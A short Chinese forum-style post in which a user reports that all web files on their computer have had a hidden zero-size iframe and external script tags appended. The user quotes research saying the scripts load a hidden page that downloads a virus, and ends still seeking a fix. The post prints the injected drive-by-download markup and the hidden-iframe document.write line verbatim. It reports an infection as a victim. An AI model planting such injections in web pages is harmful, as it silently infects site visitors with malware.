一个非常奇怪的现象,在我电脑中所有的网页文件(html,asp,aspx等等)在最后几行都被加入了以下代码:
<iframe src="http://222.208.183.246/htm/jh.htm" width="0" height="0" frameborder="0"></iframe>
<script src="http://222.208.183.246/ad/ad.js"></script>
<script src="http://222.208.183.246/ad/ad.js"></script>
<script src="http://222.208.183.246/ad/ad.js"></script>
在网上找了一些资料,具体如下:
据查,IP 222.208.183.246 所指向的网站是21CN两性宽屏,执行该段代码后会自动下载一个JScript 脚本文件,该脚本文件是一个可以在客户端运行的语言程序,用记事本打开该文件,里面有一段代码 “document.write("<iframe src='http://down.136136.net/htm/' width='0' height='0' scrolling='no' frameborder='0'></iframe>")”。这段代码会自动执行,并打开“down.136136.net/htm”网页。但是我们并不能看到该网页,因为它被设置成隐藏的。该网页会自动下载病毒,你打开这个网页,瑞星监控会提示你有病毒,但是杀不了。如果你试图打开down.136136.net,会被警告您无权查看该网页,而www.136136.net指向的却是大名鼎鼎的百度。如果你不小心打开了有上面代码的网页,恭喜你,你中标了,这就是为什么你打开某个网页会中毒的原因了。
怎么样将那个讨厌的尾巴去掉,还在摸索当中.